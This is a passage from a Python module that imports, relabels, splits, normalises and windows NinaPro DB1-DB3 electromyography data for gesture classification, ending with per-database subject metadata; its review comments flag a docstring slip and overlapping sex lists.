            rep_regions[2 * i + 1] = rep_end_idx - 1
            nb_capped += 2  # this rep's tail and the next rep's head were capped
        cur_rep += 1
        if cur_rep > nb_unique_reps:
            cur_rep = 1  # repetition numbering cycles per movement block
    # Close off the final repetition half-way into the trailing rest.
    end_idx = int(round((emg.shape[0] + move_regions[-1]) / 2))
    rep[last_end_idx:end_idx] = cur_rep
    rep_regions[-2] = last_end_idx
    rep_regions[-1] = end_idx - 1
    return {'emg': emg,
            'rep': rep,
            'move': move,
            'rep_regions': rep_regions,
            'nb_capped': nb_capped
            }
def import_db1_unrefined(folder_path, subject, rest_length_cap=999):
    """Get the original repetition and stimulus information DB1 (repetition still aligned as rest-move-rest).

    Unlike import_db1 this reads the unrefined 'repetition'/'stimulus'
    fields instead of 'rerepetition'/'restimulus', and does not return EMG.

    Args:
        folder_path (string): Path to folder containing raw mat files
        subject (int): 1-27 which subject's data to import
        rest_length_cap (int, optional): The number of seconds of rest data to keep before/after a movement

    Returns:
        Dictionary: Unrefined repetition and movement labels, indices of where repetitions are
        demarked and the number of repetitions with capped off rest data
    """
    fs = 100  # DB1 sampling rate (Hz); converts rest_length_cap (s) to samples
    # Exercise file E1: take the unrefined labels as stored.
    cur_path = os.path.normpath(folder_path + '/S' + str(subject) + '_A1_E1.mat')
    data = sio.loadmat(cur_path)
    rep = np.squeeze(np.array(data['repetition']))
    move = np.squeeze(np.array(data['stimulus']))
    # Exercise file E2: offset non-rest labels by the largest label so far.
    cur_path = os.path.normpath(folder_path + '/S' + str(subject) + '_A1_E2.mat')
    data = sio.loadmat(cur_path)
    rep = np.append(rep, np.squeeze(np.array(data['repetition'])))
    move_tmp = np.squeeze(np.array(data['stimulus']))  # Fix for numbering
    move_tmp[move_tmp != 0] += max(move)
    move = np.append(move, move_tmp)
    # Exercise file E3: same label-offset fix as E2.
    cur_path = os.path.normpath(folder_path + '/S' + str(subject) + '_A1_E3.mat')
    data = sio.loadmat(cur_path)
    rep = np.append(rep, np.squeeze(np.array(data['repetition'])))
    move_tmp = np.squeeze(np.array(data['stimulus']))  # Fix for numbering
    move_tmp[move_tmp != 0] += max(move)
    move = np.append(move, move_tmp)
    move = move.astype('int8')  # To minimise overhead
    # Label repetitions using new block style: rest-move-rest regions.
    # move_regions holds indices where the movement label changes.
    move_regions = np.where(np.diff(move))[0]
    rep_regions = np.zeros((move_regions.shape[0],), dtype=int)
    nb_reps = int(round(move_regions.shape[0] / 2))
    last_end_idx = int(round(move_regions[0] / 2))  # start half-way into the leading rest
    nb_unique_reps = np.unique(rep).shape[0] - 1  # To account for 0 regions
    nb_capped = 0
    cur_rep = 1
    rep = np.zeros([rep.shape[0], ], dtype=np.int8)  # Reset rep array
    for i in range(nb_reps - 1):
        rep_regions[2 * i] = last_end_idx
        # Split the rest gap between two movements at its midpoint.
        midpoint_idx = int(round((move_regions[2 * (i + 1) - 1] +
                                  move_regions[2 * (i + 1)]) / 2)) + 1
        trailing_rest_samps = midpoint_idx - move_regions[2 * (i + 1) - 1]
        if trailing_rest_samps <= rest_length_cap * fs:
            # Rest gap short enough: the whole half-gap belongs to this rep.
            rep[last_end_idx:midpoint_idx] = cur_rep
            last_end_idx = midpoint_idx
            rep_regions[2 * i + 1] = midpoint_idx - 1
        else:
            # Cap the rest data kept on both sides of the gap.
            rep_end_idx = (move_regions[2 * (i + 1) - 1] +
                           int(round(rest_length_cap * fs)))
            rep[last_end_idx:rep_end_idx] = cur_rep
            last_end_idx = ((move_regions[2 * (i + 1)] -
                             int(round(rest_length_cap * fs))))
            rep_regions[2 * i + 1] = rep_end_idx - 1
            nb_capped += 2  # this rep's tail and the next rep's head were capped
        cur_rep += 1
        if cur_rep > nb_unique_reps:
            cur_rep = 1  # repetition numbering cycles per movement block
    # Close off the final repetition half-way into the trailing rest
    # (no emg here, so the total length comes from rep itself).
    end_idx = int(round((rep.shape[0] + move_regions[-1]) / 2))
    rep[last_end_idx:end_idx] = cur_rep
    rep_regions[-2] = last_end_idx
    rep_regions[-1] = end_idx - 1
    return {'rep': rep,
            'move': move,
            'rep_regions': rep_regions,
            'nb_capped': nb_capped
            }
def import_db2(folder_path, subject, rest_length_cap=999):
    """Function for extracting data from raw NinaiPro files for DB2.

    Args:
        folder_path (string): Path to folder containing raw mat files
        subject (int): 1-40 which subject's data to import
        rest_length_cap (int, optional): The number of seconds of rest data to keep before/after a movement

    Returns:
        Dictionary: Raw EMG data, corresponding repetition and movement labels, indices of where repetitions are
        demarked and the number of repetitions with capped off rest data

    Note:
        Last 9 "movements" are actually force exercises
    """
    fs = 2000  # DB2 sampling rate (Hz); converts rest_length_cap (s) to samples
    # Exercise file E1: take emg / refined repetition / refined stimulus as stored.
    cur_path = os.path.normpath(folder_path + '/S' + str(subject) + '_E1_A1.mat')
    data = sio.loadmat(cur_path)
    emg = np.squeeze(np.array(data['emg']))
    rep = np.squeeze(np.array(data['rerepetition']))
    move = np.squeeze(np.array(data['restimulus']))
    # Exercise file E2: labels continue on from E1, so no offset fix needed.
    cur_path = os.path.normpath(folder_path + '/S' + str(subject) + '_E2_A1.mat')
    data = sio.loadmat(cur_path)
    emg = np.vstack((emg, np.array(data['emg'])))
    rep = np.append(rep, np.squeeze(np.array(data['rerepetition'])))
    move_tmp = np.squeeze(np.array(data['restimulus']))
    move = np.append(move, move_tmp)  # Note no fix needed for this exercise
    # Exercise file E3 (force exercises).
    cur_path = os.path.normpath(folder_path + '/S' + str(subject) + '_E3_A1.mat')
    data = sio.loadmat(cur_path)
    emg = np.vstack((emg, np.array(data['emg'])))
    data['repetition'][-1] = 0  # Fix for diffing
    rep = np.append(rep, np.squeeze(np.array(data['repetition'])))
    # Movements number in non-logical pattern [0 1 2 4 6 8 9 16 32 40]
    # Also note that for last file there is no 'rerepetition or 'restimulus',
    # so remap the raw stimulus codes onto the contiguous range 41-49.
    data['stimulus'][-1] = 0  # Fix for diffing
    data['stimulus'][np.where(data['stimulus'] == 1)] = 41
    data['stimulus'][np.where(data['stimulus'] == 2)] = 42
    data['stimulus'][np.where(data['stimulus'] == 4)] = 43
    data['stimulus'][np.where(data['stimulus'] == 6)] = 44
    data['stimulus'][np.where(data['stimulus'] == 8)] = 45
    data['stimulus'][np.where(data['stimulus'] == 9)] = 46
    data['stimulus'][np.where(data['stimulus'] == 16)] = 47
    data['stimulus'][np.where(data['stimulus'] == 32)] = 48
    data['stimulus'][np.where(data['stimulus'] == 40)] = 49
    move_tmp = np.squeeze(np.array(data['stimulus']))
    move = np.append(move, move_tmp)
    move = move.astype('int8')  # To minimise overhead
    # Label repetitions using new block style: rest-move-rest regions.
    # move_regions holds indices where the movement label changes.
    move_regions = np.where(np.diff(move))[0]
    rep_regions = np.zeros((move_regions.shape[0],), dtype=int)
    nb_reps = int(round(move_regions.shape[0] / 2))
    last_end_idx = int(round(move_regions[0] / 2))  # start half-way into the leading rest
    nb_unique_reps = np.unique(rep).shape[0] - 1  # To account for 0 regions
    nb_capped = 0
    cur_rep = 1
    rep = np.zeros([rep.shape[0], ], dtype=np.int8)  # Reset rep array
    for i in range(nb_reps - 1):
        rep_regions[2 * i] = last_end_idx
        # Split the rest gap between two movements at its midpoint.
        midpoint_idx = int(round((move_regions[2 * (i + 1) - 1] +
                                  move_regions[2 * (i + 1)]) / 2)) + 1
        trailing_rest_samps = midpoint_idx - move_regions[2 * (i + 1) - 1]
        if trailing_rest_samps <= rest_length_cap * fs:
            # Rest gap short enough: the whole half-gap belongs to this rep.
            rep[last_end_idx:midpoint_idx] = cur_rep
            last_end_idx = midpoint_idx
            rep_regions[2 * i + 1] = midpoint_idx - 1
        else:
            # Cap the rest data kept on both sides of the gap.
            rep_end_idx = (move_regions[2 * (i + 1) - 1] +
                           int(round(rest_length_cap * fs)))
            rep[last_end_idx:rep_end_idx] = cur_rep
            last_end_idx = ((move_regions[2 * (i + 1)] -
                             int(round(rest_length_cap * fs))))
            rep_regions[2 * i + 1] = rep_end_idx - 1
            nb_capped += 2  # this rep's tail and the next rep's head were capped
        cur_rep += 1
        if cur_rep > nb_unique_reps:
            cur_rep = 1  # repetition numbering cycles per movement block
    # Close off the final repetition half-way into the trailing rest.
    end_idx = int(round((emg.shape[0] + move_regions[-1]) / 2))
    rep[last_end_idx:end_idx] = cur_rep
    rep_regions[-2] = last_end_idx
    rep_regions[-1] = end_idx - 1
    return {'emg': emg,
            'rep': rep,
            'move': move,
            'rep_regions': rep_regions,
            'nb_capped': nb_capped
            }
def import_db2_unrefined(folder_path, subject, rest_length_cap=999):
    """Get the original repetition and stimulus information DB1 (repetition still aligned as rest-move-rest).

    NOTE(review): the summary above says DB1 but this reads DB2-style files
    ('_E1_A1.mat' naming, fs=2000) — presumably a copy-paste in the original
    docstring; behaviour targets DB2. Reads the unrefined
    'repetition'/'stimulus' fields and does not return EMG.

    Args:
        folder_path (string): Path to folder containing raw mat files
        subject (int): 1-27 which subject's data to import
        rest_length_cap (int, optional): The number of seconds of rest data to keep before/after a movement

    Returns:
        Dictionary: Unrefined repetition and movement labels, indices of where repetitions are
        demarked and the number of repetitions with capped off rest data
    """
    fs = 2000  # DB2 sampling rate (Hz); converts rest_length_cap (s) to samples
    # Exercise file E1: take the unrefined labels as stored.
    cur_path = os.path.normpath(folder_path + '/S' + str(subject) + '_E1_A1.mat')
    data = sio.loadmat(cur_path)
    rep = np.squeeze(np.array(data['repetition']))
    move = np.squeeze(np.array(data['stimulus']))
    # Exercise file E2: labels continue on from E1, so no offset fix needed.
    cur_path = os.path.normpath(folder_path + '/S' + str(subject) + '_E2_A1.mat')
    data = sio.loadmat(cur_path)
    rep = np.append(rep, np.squeeze(np.array(data['repetition'])))
    move_tmp = np.squeeze(np.array(data['stimulus']))
    move = np.append(move, move_tmp)  # Note no fix needed for this exercise
    # Exercise file E3 (force exercises).
    cur_path = os.path.normpath(folder_path + '/S' + str(subject) + '_E3_A1.mat')
    data = sio.loadmat(cur_path)
    data['repetition'][-1] = 0  # Fix for diffing
    rep = np.append(rep, np.squeeze(np.array(data['repetition'])))
    # Movements number in non-logical pattern [0 1 2 4 6 8 9 16 32 40];
    # remap the raw stimulus codes onto the contiguous range 41-49.
    data['stimulus'][-1] = 0  # Fix for diffing
    data['stimulus'][np.where(data['stimulus'] == 1)] = 41
    data['stimulus'][np.where(data['stimulus'] == 2)] = 42
    data['stimulus'][np.where(data['stimulus'] == 4)] = 43
    data['stimulus'][np.where(data['stimulus'] == 6)] = 44
    data['stimulus'][np.where(data['stimulus'] == 8)] = 45
    data['stimulus'][np.where(data['stimulus'] == 9)] = 46
    data['stimulus'][np.where(data['stimulus'] == 16)] = 47
    data['stimulus'][np.where(data['stimulus'] == 32)] = 48
    data['stimulus'][np.where(data['stimulus'] == 40)] = 49
    move_tmp = np.squeeze(np.array(data['stimulus']))
    move = np.append(move, move_tmp)
    move = move.astype('int8')  # To minimise overhead
    # Label repetitions using new block style: rest-move-rest regions.
    # move_regions holds indices where the movement label changes.
    move_regions = np.where(np.diff(move))[0]
    rep_regions = np.zeros((move_regions.shape[0],), dtype=int)
    nb_reps = int(round(move_regions.shape[0] / 2))
    last_end_idx = int(round(move_regions[0] / 2))  # start half-way into the leading rest
    nb_unique_reps = np.unique(rep).shape[0] - 1  # To account for 0 regions
    nb_capped = 0
    cur_rep = 1
    rep = np.zeros([rep.shape[0], ], dtype=np.int8)  # Reset rep array
    for i in range(nb_reps - 1):
        rep_regions[2 * i] = last_end_idx
        # Split the rest gap between two movements at its midpoint.
        midpoint_idx = int(round((move_regions[2 * (i + 1) - 1] +
                                  move_regions[2 * (i + 1)]) / 2)) + 1
        trailing_rest_samps = midpoint_idx - move_regions[2 * (i + 1) - 1]
        if trailing_rest_samps <= rest_length_cap * fs:
            # Rest gap short enough: the whole half-gap belongs to this rep.
            rep[last_end_idx:midpoint_idx] = cur_rep
            last_end_idx = midpoint_idx
            rep_regions[2 * i + 1] = midpoint_idx - 1
        else:
            # Cap the rest data kept on both sides of the gap.
            rep_end_idx = (move_regions[2 * (i + 1) - 1] +
                           int(round(rest_length_cap * fs)))
            rep[last_end_idx:rep_end_idx] = cur_rep
            last_end_idx = ((move_regions[2 * (i + 1)] -
                             int(round(rest_length_cap * fs))))
            rep_regions[2 * i + 1] = rep_end_idx - 1
            nb_capped += 2  # this rep's tail and the next rep's head were capped
        cur_rep += 1
        if cur_rep > nb_unique_reps:
            cur_rep = 1  # repetition numbering cycles per movement block
    # Close off the final repetition half-way into the trailing rest
    # (no emg here, so the total length comes from rep itself).
    end_idx = int(round((rep.shape[0] + move_regions[-1]) / 2))
    rep[last_end_idx:end_idx] = cur_rep
    rep_regions[-2] = last_end_idx
    rep_regions[-1] = end_idx - 1
    return {'rep': rep,
            'move': move,
            'rep_regions': rep_regions,
            'nb_capped': nb_capped
            }
def import_db3(folder_path, subject, rest_length_cap=999):
    """Function for extracting data from raw NinaiPro files for DB3.

    Args:
        folder_path (string): Path to folder containing raw mat files
        subject (int): 1-11 which subject's data to import
        rest_length_cap (int, optional): The number of seconds of rest data to keep before/after a movement

    Returns:
        Dictionary: Raw EMG data, corresponding repetition and movement labels, indices of where repetitions are
        demarked and the number of repetitions with capped off rest data

    Note:
        Last 9 "movements" are actually force exercises
    """
    fs = 2000  # DB3 sampling rate (Hz); converts rest_length_cap (s) to samples
    # Exercise file E1: take emg / refined repetition / refined stimulus as stored.
    cur_path = os.path.normpath(folder_path + '/S' + str(subject) + '_E1_A1.mat')
    data = sio.loadmat(cur_path)
    emg = np.squeeze(np.array(data['emg']))
    rep = np.squeeze(np.array(data['rerepetition']))
    move = np.squeeze(np.array(data['restimulus']))
    # Exercise file E2: labels continue on from E1, so no offset fix needed.
    cur_path = os.path.normpath(folder_path + '/S' + str(subject) + '_E2_A1.mat')
    data = sio.loadmat(cur_path)
    emg = np.vstack((emg, np.array(data['emg'])))
    rep = np.append(rep, np.squeeze(np.array(data['rerepetition'])))
    move_tmp = np.squeeze(np.array(data['restimulus']))
    move = np.append(move, move_tmp)  # Note no fix needed for this exercise
    last_mov = max(move)  # highest movement label so far; E3 labels continue from it
    # Exercise file E3 (force exercises): raw codes follow the non-logical
    # pattern [0 1 2 4 6 8 9 16 32 40]; remap them to last_mov + 1..9.
    cur_path = os.path.normpath(folder_path + '/S' + str(subject) + '_E3_A1.mat')
    data = sio.loadmat(cur_path)
    emg = np.vstack((emg, np.array(data['emg'])))
    rep = np.append(rep, np.squeeze(np.array(data['rerepetition'])))
    data['restimulus'][np.where(data['restimulus'] == 1)] = last_mov + 1
    data['restimulus'][np.where(data['restimulus'] == 2)] = last_mov + 2
    data['restimulus'][np.where(data['restimulus'] == 4)] = last_mov + 3
    data['restimulus'][np.where(data['restimulus'] == 6)] = last_mov + 4
    data['restimulus'][np.where(data['restimulus'] == 8)] = last_mov + 5
    data['restimulus'][np.where(data['restimulus'] == 9)] = last_mov + 6
    data['restimulus'][np.where(data['restimulus'] == 16)] = last_mov + 7
    data['restimulus'][np.where(data['restimulus'] == 32)] = last_mov + 8
    data['restimulus'][np.where(data['restimulus'] == 40)] = last_mov + 9
    move_tmp = np.squeeze(np.array(data['restimulus']))
    move = np.append(move, move_tmp)  # Note no fix needed for this exercise
    move = move.astype('int8')  # To minimise overhead
    # Label repetitions using new block style: rest-move-rest regions.
    # move_regions holds indices where the movement label changes.
    move_regions = np.where(np.diff(move))[0]
    rep_regions = np.zeros((move_regions.shape[0],), dtype=int)
    nb_reps = int(round(move_regions.shape[0] / 2))
    last_end_idx = int(round(move_regions[0] / 2))  # start half-way into the leading rest
    nb_unique_reps = np.unique(rep).shape[0] - 1  # To account for 0 regions
    nb_capped = 0
    cur_rep = 1
    rep = np.zeros([rep.shape[0], ], dtype=np.int8)  # Reset rep array
    for i in range(nb_reps - 1):
        rep_regions[2 * i] = last_end_idx
        # Split the rest gap between two movements at its midpoint.
        midpoint_idx = int(round((move_regions[2 * (i + 1) - 1] +
                                  move_regions[2 * (i + 1)]) / 2)) + 1
        trailing_rest_samps = midpoint_idx - move_regions[2 * (i + 1) - 1]
        if trailing_rest_samps <= rest_length_cap * fs:
            # Rest gap short enough: the whole half-gap belongs to this rep.
            rep[last_end_idx:midpoint_idx] = cur_rep
            last_end_idx = midpoint_idx
            rep_regions[2 * i + 1] = midpoint_idx - 1
        else:
            # Cap the rest data kept on both sides of the gap.
            rep_end_idx = (move_regions[2 * (i + 1) - 1] +
                           int(round(rest_length_cap * fs)))
            rep[last_end_idx:rep_end_idx] = cur_rep
            last_end_idx = ((move_regions[2 * (i + 1)] -
                             int(round(rest_length_cap * fs))))
            rep_regions[2 * i + 1] = rep_end_idx - 1
            nb_capped += 2  # this rep's tail and the next rep's head were capped
        cur_rep += 1
        if cur_rep > nb_unique_reps:
            cur_rep = 1  # repetition numbering cycles per movement block
    # Close off the final repetition half-way into the trailing rest.
    end_idx = int(round((emg.shape[0] + move_regions[-1]) / 2))
    rep[last_end_idx:end_idx] = cur_rep
    rep_regions[-2] = last_end_idx
    rep_regions[-1] = end_idx - 1
    return {'emg': emg,
            'rep': rep,
            'move': move,
            'rep_regions': rep_regions,
            'nb_capped': nb_capped
            }
def import_db2_acc(folder_path, subject):
    """Function for extracting acceleronmeter data from raw NinaiPro files for DB2.

    Args:
        folder_path (string): Path to folder containing raw mat files
        subject (int): 1-40 which subject's data to import

    Returns:
        array: Raw accceleronmeter from each electrode
    """
    acc = None
    for suffix in ('_E1_A1.mat', '_E2_A1.mat', '_E3_A1.mat'):
        mat_path = os.path.normpath(folder_path + '/S' + str(subject) + suffix)
        block = np.array(sio.loadmat(mat_path)['acc'])
        if acc is None:
            # First exercise file establishes the array (squeezed, matching
            # how the other importers load their first file).
            acc = np.squeeze(block)
        else:
            acc = np.vstack((acc, block))
    return acc
def gen_split_balanced(rep_ids, nb_test, base=None):
    """Create a balanced split for training and testing based on repetitions
    (all reps equally tested + trained on).

    One split is produced per repetition; the random search retries until
    every repetition appears in exactly nb_test test sets.

    Args:
        rep_ids (array): Repetition identifiers to split
        nb_test (int): The number of repetitions to be used for testing in each split
        base (array, optional): A specific test set to use (must be of length nb_test)

    Returns:
        Arrays: Training repetitions and corresponding test repetitions as 2D
        arrays [[set 1], [set 2] ..]
    """
    nb_reps = rep_ids.shape[0]
    nb_splits = nb_reps
    train_reps = np.zeros((nb_splits, nb_reps - nb_test,), dtype=int)
    test_reps = np.zeros((nb_splits, nb_test), dtype=int)
    # Generate all possible combinations
    all_combos = combinations(rep_ids, nb_test)
    all_combos = np.fromiter(chain.from_iterable(all_combos), int)
    all_combos = all_combos.reshape(-1, nb_test)
    if base is not None:
        # Pin the requested test set as split 0 and remove it from the pool
        test_reps[0, :] = base
        all_combos = np.delete(all_combos, np.where(np.all(all_combos == base, axis=1))[0][0], axis=0)
        cur_split = 1
    else:
        cur_split = 0
    # Snapshot of the candidate pool; np.delete below returns new arrays, so
    # this reference still holds the full (post-base-removal) pool for restarts.
    all_combos_copy = all_combos
    reset_counter = 0
    while cur_split < (nb_splits):
        # Restart the random search when stuck: 10 rejected draws in a row,
        # or the candidate pool is exhausted.
        if reset_counter >= 10 or all_combos.shape[0] == 0:
            all_combos = all_combos_copy
            test_reps = np.zeros((nb_splits, nb_test), dtype=int)
            if base is not None:
                test_reps[0, :] = base
                cur_split = 1
            else:
                cur_split = 0
            reset_counter = 0
        # Draw a candidate test set without replacement
        randomIndex = np.random.randint(0, all_combos.shape[0])
        test_reps[cur_split, :] = all_combos[randomIndex, :]
        all_combos = np.delete(all_combos, randomIndex, axis=0)
        _, counts = np.unique(test_reps[:cur_split + 1], return_counts=True)
        # Reject the draw if any repetition would now appear in more than
        # nb_test of the filled test sets (keeps the split balanced)
        if max(counts) > nb_test:
            test_reps[cur_split, :] = np.zeros((1, nb_test), dtype=int)
            reset_counter += 1
            continue
        else:
            cur_split += 1
            reset_counter = 0
    # Training set of each split is everything not in its test set
    for i in range(nb_splits):
        train_reps[i, :] = np.setdiff1d(rep_ids, test_reps[i, :])
    return train_reps, test_reps
def gen_split_rand(rep_ids, nb_test, nb_splits, base=None):
    """Randomly generate nb_splits out of nb_reps training-test splits.

    Args:
        rep_ids (array): Repetition identifiers to split
        nb_test (int): The number of repetitions to be used for testing in each split
        nb_splits (int): The number of splits to produce
        base (array, optional): A specific test set to use (must be of length nb_test)

    Returns:
        Arrays: Training repetitions and corresponding test repetitions as 2D
        arrays [[set 1], [set 2] ..]
    """
    nb_reps = rep_ids.shape[0]
    # Pool of every possible test-set combination
    all_combos = combinations(rep_ids, nb_test)
    all_combos = np.fromiter(chain.from_iterable(all_combos), int)
    all_combos = all_combos.reshape(-1, nb_test)
    train_reps = np.zeros((nb_splits, nb_reps - nb_test,), dtype=int)
    test_reps = np.zeros((nb_splits, nb_test), dtype=int)
    cur_split = 0
    if base is not None:
        # Pin the requested test set as split 0 and remove it from the pool
        test_reps[0, :] = base
        train_reps[0, :] = np.setdiff1d(rep_ids, test_reps[0, :])
        all_combos = np.delete(all_combos, np.where(np.all(all_combos == base, axis=1))[0][0], axis=0)
        cur_split = 1
    # Draw the remaining test sets without replacement from the pool
    for i in range(cur_split, nb_splits):
        rand_idx = np.random.randint(all_combos.shape[0])
        test_reps[i, :] = all_combos[rand_idx, :]
        train_reps[i, :] = np.setdiff1d(rep_ids, test_reps[i, :])
        all_combos = np.delete(all_combos, rand_idx, axis=0)
    return train_reps, test_reps
def normalise_emg(emg, reps, train_reps, movements=None, which_moves=None):
    """Preprocess train+test data to mean 0, std 1 based on training data only.

    Args:
        emg (array): Raw EMG data
        reps (array): Corresponding repetition information for each EMG observation
        train_reps (array): Which repetitions are in the training set
        movements (array, optional): Movement labels, required if using which_moves
        which_moves (array, optional): Which movements to fit on - if None use all

    Returns:
        array: Rescaled EMG data (all observations, scaled with the training
        set's statistics)
    """
    fit_idxs = get_idxs(reps, train_reps)
    # Optionally restrict the fitting set to the selected movement(s)
    if which_moves is not None and movements is not None:
        keep = get_idxs(movements[fit_idxs], which_moves)
        fit_idxs = fit_idxs[keep]
    # copy=False lets the scaler work in place where possible
    scaler = StandardScaler(with_mean=True, with_std=True, copy=False)
    scaler.fit(emg[fit_idxs, :])
    return scaler.transform(emg)
def get_windows(which_reps, window_len, window_inc, emg, movements, repetitons, which_moves=None, dtype=np.float32):
    """Get set of windows based on repetition and movement criteria and
    associated label + repetition data.

    Args:
        which_reps (array): Which repetitions to return
        window_len (int): Desired window length
        window_inc (int): Desired window increment
        emg (array): EMG data (should be normalised beforehand)
        movements (array): Movement labels
        repetitons (array): Repetition labels
        which_moves (array, optional): Which movements to return - if None use all
        dtype (TYPE, optional): What precision to use for EMG data

    Returns:
        X_data (array): Windowed EMG data
        Y_data (array): Movement label for each window
        R_data (array): Repetition label for each window
    """
    nb_obs = emg.shape[0]
    nb_channels = emg.shape[1]
    # Candidate window-end positions: one every window_inc samples
    candidate_ends = np.arange(window_len - 1, nb_obs, window_inc)
    keep = get_idxs(repetitons[candidate_ends], which_reps)
    # Map kept positions back into the original sample range (so we can
    # index into movements/repetitons directly)
    win_ends = (window_len - 1) + keep * window_inc
    # Keep only selected movement(s)
    if which_moves is not None:
        move_keep = get_idxs(movements[win_ends], which_moves)
        win_ends = win_ends[move_keep]
    nb_windows = win_ends.shape[0]
    X_data = np.zeros([nb_windows, window_len, nb_channels, 1], dtype=dtype)
    Y_data = np.zeros([nb_windows, ], dtype=np.int8)
    R_data = np.zeros([nb_windows, ], dtype=np.int8)
    for i, win_end in enumerate(win_ends):
        win_start = win_end - (window_len - 1)
        # Skip windows that straddle a movement boundary
        if movements[win_start] == movements[win_end]:
            X_data[i, :, :, 0] = emg[win_start:win_end + 1, :]  # Include end
            Y_data[i] = movements[win_end]
            R_data[i] = repetitons[win_end]
    return X_data, Y_data, R_data
def to_categorical(y, nb_classes=None):
    """Convert a class vector (integers) to a binary class matrix.

    E.g. for use with categorical_crossentropy.

    Args:
        y: class vector to be converted into a matrix
            (integers from 0 to nb_classes).
        nb_classes: total number of classes; inferred from the data when
            omitted (or falsy).

    Returns:
        A binary matrix representation of the input.

    Adapted from Keras v2.0.2 np_utils
    (https://github.com/fchollet/keras/blob/master/keras/utils/np_utils.py)
    to remove an unnecessary Keras dependency.
    """
    labels = np.array(y, dtype='int').ravel()
    if not nb_classes:
        # Infer the class count from the largest label present
        nb_classes = np.max(labels) + 1
    nb_samples = labels.shape[0]
    one_hot = np.zeros((nb_samples, nb_classes))
    one_hot[np.arange(nb_samples), labels] = 1
    return one_hot
def get_idxs(in_array, to_find):
    """Utility function for finding the positions of observations of one
    array in another array.

    Args:
        in_array (array): Array in which to locate elements of to_find
        to_find (array): Array of elements to locate in in_array

    Returns:
        TYPE: Indices of all elements of to_find in in_array, grouped by
        to_find element (in to_find order)
    """
    matches = []
    for value in to_find:
        matches.append(np.where(in_array == value))
    return np.squeeze(np.concatenate(matches, axis=1))
def db_info(db):
    """Return relevant info on databases 1 and 2.

    Args:
        db (int): Which database to get info on (1 or 2 currently)

    Returns:
        Dict: Useful information on selected database

    Raises:
        ValueError: If db is not 1 or 2.
    """
    if db == 1:
        # General Info
        nb_subjects = 27
        nb_channels = 10
        nb_moves = 53  # 52 + rest
        nb_reps = 10
        fs = 100
        # Labels
        rep_labels = np.array(range(1, nb_reps + 1))
        move_labels = np.array(range(1, nb_moves + 1))
        # Male - Female (1-based subject numbers; *_ind are 0-based indices)
        female = np.array([6, 8, 10, 14, 15, 20, 22])
        # NOTE(review): subjects 6, 8, 10, 15, 20, 22 appear in BOTH the
        # female and male arrays here - verify against the NinaPro DB1
        # subject metadata before relying on these groupings.
        male = np.array([1, 2, 3, 4, 6, 8, 10, 11, 12, 15, 16, 17, 18, 20, 22, 23, 24, 25, 26, 27])
        female_ind = np.array([5, 7, 9, 13, 14, 19, 21])
        male_ind = np.array([0, 1, 2, 3, 5, 7, 9, 10, 11, 14, 15, 16, 17, 19, 21, 22, 23, 24, 25, 26])
        # Handedness
        left_handed = np.array([14, 16])
        right_handed = np.array([1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 15,
                                 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27])
        left_handed_ind = np.array([13, 15])
        right_handed_ind = np.array([0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12,
                                     14, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26])
        # Other Info (synced: element i describes subject i + 1)
        ages = np.array([31, 27, 22, 27, 27, 22, 28, 27, 23, 30, 28, 25, 27,
                         29, 26, 29, 30, 29, 34, 26, 38, 35, 30, 26, 28, 40, 28])
        heights = np.array([170, 170, 180, 183, 178, 163, 170, 164, 173, 160, 170, 185, 184,
                            155, 162, 167, 175, 178, 173, 165, 178, 168, 180, 180, 180, 179, 185])
        weights = np.array([75, 62, 85, 95, 75, 48, 60, 54, 63, 60, 67, 80, 85,
                            54, 60, 67, 76, 68, 82, 54, 73, 65, 65, 65, 70, 66, 100])
    elif db == 2:
        # General Info
        nb_subjects = 40
        nb_channels = 12
        nb_moves = 50  # 40 + 9 force movements + rest
        nb_reps = 6
        fs = 2000
        # Labels
        rep_labels = np.array(range(1, nb_reps + 1))
        move_labels = np.array(range(1, nb_moves + 1))
        # Male - Female (1-based subject numbers; *_ind are 0-based indices)
        female = np.array([4, 11, 14, 18, 19, 20, 22, 28, 35, 36, 38])
        male = np.array([1, 2, 3, 5, 6, 7, 8, 9, 10, 12, 13, 15, 16, 17, 21,
                         23, 24, 25, 26, 27, 29, 30, 31, 32, 33, 34, 37, 39, 40])
        female_ind = np.array([3, 10, 13, 17, 18, 19, 21, 27, 34, 35, 37])
        male_ind = np.array([0, 1, 2, 4, 5, 6, 7, 8, 9, 11, 12, 14, 15, 16, 20,
                             22, 23, 24, 25, 26, 28, 29, 30, 31, 32, 33, 36, 38, 39])
        # Handedness
        left_handed = np.array([4, 13, 22, 25, 26])
        right_handed = np.array([1, 2, 3, 5, 6, 7, 8, 9, 10, 11, 12, 14, 15, 16, 17, 18, 19, 20,
                                 21, 23, 24, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40])
        left_handed_ind = np.array([3, 12, 21, 24, 25])
        right_handed_ind = np.array([0, 1, 2, 4, 5, 6, 7, 8, 9, 10, 11, 13, 14, 15, 16, 17, 18, 19,
                                     20, 22, 23, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39])
        # Other Info (synced: element i describes subject i + 1)
        ages = np.array([29, 29, 31, 30, 25, 35, 27, 45, 23, 34, 32, 29, 30, 30, 30, 34, 29, 30, 31,
                         26, 32, 28, 25, 28, 31, 30, 29, 29, 27, 30, 29, 28, 25, 31, 24, 27, 34, 30, 31, 31])
        heights = np.array([187, 183, 174, 154, 175, 172, 187, 173, 172, 173, 150, 184, 182, 173, 169, 173, 175, 169,
                            158, 155, 170, 162, 170, 170, 168, 186, 170, 160, 171, 173, 185, 173, 183, 192, 170, 155,
                            190, 163, 183, 173])
        weights = np.array([75, 75, 69, 50, 70, 79, 92, 73, 63, 84, 54, 90, 70, 59, 58, 76, 70, 90, 52,
                            52, 75, 54, 66, 73, 70, 90, 65, 61, 64, 68, 98, 72, 71, 78, 52, 44, 105, 62, 96, 65])
    else:
        raise ValueError('db should be either 1 for database 1 or 2 for database 2')
    return {'nb_subjects': nb_subjects,
            'nb_channels': nb_channels,
            'nb_moves': nb_moves,
            'nb_reps': nb_reps,
            'fs': fs,
            'rep_labels': rep_labels,
            'move_labels': move_labels,
            'female': female,
            'male': male,
            'female_ind': female_ind,
            'male_ind': male_ind,
            'left_handed': left_handed,
            'right_handed': right_handed,
            'left_handed_ind': left_handed_ind,
            'right_handed_ind': right_handed_ind,
            'ages': ages,
            'heights': heights,
